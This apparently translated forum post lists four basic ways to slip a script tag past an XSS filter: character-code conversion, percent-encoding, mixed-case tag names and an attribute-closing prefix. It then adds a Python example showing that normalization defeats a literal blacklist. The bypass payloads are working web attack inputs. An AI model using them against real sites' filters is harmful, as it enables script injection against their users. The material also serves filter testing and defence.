Four extremely basic bypass methods.

1. Convert to ASCII codes
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>
(String.fromCharCode only returns the decoded text as a string value; the literal tokens alert and ( never appear in the input, which is what a literal-match filter looks for.)

2. Convert to HEX (hexadecimal, i.e. URL percent-encoding)
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e

3. Change the letter case of the script
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: <ScRipt>alert('I love F4ck')</sCRipT>
Only the HTML tag names can be varied this way: browsers match tag names case-insensitively, but JavaScript identifiers such as alert are case-sensitive.

4. Prepend a closing marker "> (to close an enclosing attribute value and tag)
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: "><script>alert('I love F4ck')</script>
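As an added example (not part of the original post), the following Python check shows why a literal-match blacklist misses the encoded variants above, while a normalizing step (percent-decode, expand String.fromCharCode, case-fold) flags all of them. The sample strings are the post's own payloads with straight quotes; the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the five forms shown in the post, quotes straightened.
SAMPLES = {
    "plain": "<script>alert('I love F4ck')</script>",
    "charcode": ("<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32,"
                 " 108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>"),
    "hex": ("%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65"
            "%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e"),
    "case": "<ScRipt>alert('I love F4ck')</sCRipT>",
    "breakout": "\"><script>alert('I love F4ck')</script>",
}

def naive_filter_flags(s):
    """A literal blacklist: flags only the exact lowercase signature."""
    return "<script>alert(" in s

def canonicalize(s):
    """Undo the three encodings the post lists before inspecting the input."""
    # 1. Percent-decode until the string stops changing (covers double encoding).
    prev = None
    while prev != s:
        prev, s = s, unquote(s)
    # 2. Replace String.fromCharCode(...) with the characters it would produce.
    def expand(m):
        return "".join(chr(int(c)) for c in re.findall(r"\d+", m.group(1)))
    s = re.sub(r"String\.fromCharCode\s*\(([^)]*)\)", expand, s)
    # 3. Case-fold: browsers treat HTML tag names case-insensitively.
    return s.lower()

def normalized_filter_flags(s):
    """Same kind of signature check, but run over the canonical form."""
    return "<script" in canonicalize(s)

def compare_filters(samples=SAMPLES):
    """Per variant: (flagged by literal match, flagged after normalization)."""
    return {name: (naive_filter_flags(p), normalized_filter_flags(p))
            for name, p in samples.items()}

if __name__ == "__main__":
    for name, (naive, normalized) in compare_filters().items():
        print(f"{name:9s} literal={naive!s:5s} normalized={normalized}")
```

Normalization narrows the gap but does not close it; the dependable defence is context-aware output encoding rather than blacklisting input.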
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

The conversions above were done with the Firefox HackBar add-on.